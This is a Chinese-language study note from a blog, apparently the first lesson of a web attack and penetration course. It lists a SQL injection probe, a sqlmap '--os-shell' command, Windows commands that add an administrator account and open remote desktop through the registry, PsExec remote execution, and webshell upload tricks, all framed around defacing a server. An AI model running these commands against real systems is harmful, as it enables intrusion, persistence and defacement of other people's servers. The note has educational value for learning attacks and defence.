#学习笔记#WEB攻防与渗透技术(一)web安全概述

攻击网络服务器,远程控制机器,例如更换图片
SQL注入的漏洞,可以使用在url后加入语句 and 1=1/and 1=2来判断是否存在漏洞
服务器里的用户:两个禁用的,两个搭建网站用户,管理员用户
打开sqlmap文件夹,打开cmd命令行。
**攻击语句:**sqlmap.py -u “网页地址” --os-shell 获取系统shell

黑客常用的一些命令:
Net user 查看本机的用户列表
Net user “用户名” “密码” /add 添加用户
Net localgroup administratgors XXX /add 将XXX用户添加的administrators的组中。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 修改注册表键值开启远程桌面3389端口。
进行桌面连接。
打开图片,记住图片链接,找到源文件夹,替换图片。
更隐蔽的方式:Psexec工具
Psexec \IP -u 用户名 -p 密码 cmd
这种方法相当于把*REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal " " Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 修改注册表键值开启远程桌面3389端口。*这一步略掉,不必开启3389号端口。
SQL注入工具
旁注WEB综合检测程序 Ver3.6修正版(09.10.14版)[黑客动画吧出品-明小子]
虽然已经过时,但是对于学习还是很有必要的。

XSS
XSS也加CSS,跨站脚本攻击。是指恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
文件上传漏洞
允许用户上传的地方存在设计不严谨的地方漏洞,上传任意文件可能会让攻击者注入危险内容或恶意代码,并在服务器上运行。
绕过前台脚本检测扩展名上传WebShell,构造图片木马绕过。

WebShell
WebShell是Web入侵的脚本攻击工具。简单来说,WebShell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些asp或php木马后门文件放置在网站服务器的web目录中,与整车的网页文件混在一起。然后黑客就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。使用方法就是把asp或php木马放到对方web目录中然后在IE中输入www.xxx.com/muma.asp这样的相对路径来使用你安排好的木马。
提权就是通过获取低权限用户,再通过漏洞获得最高权限的过程。

你可能感兴趣的:(学习笔记)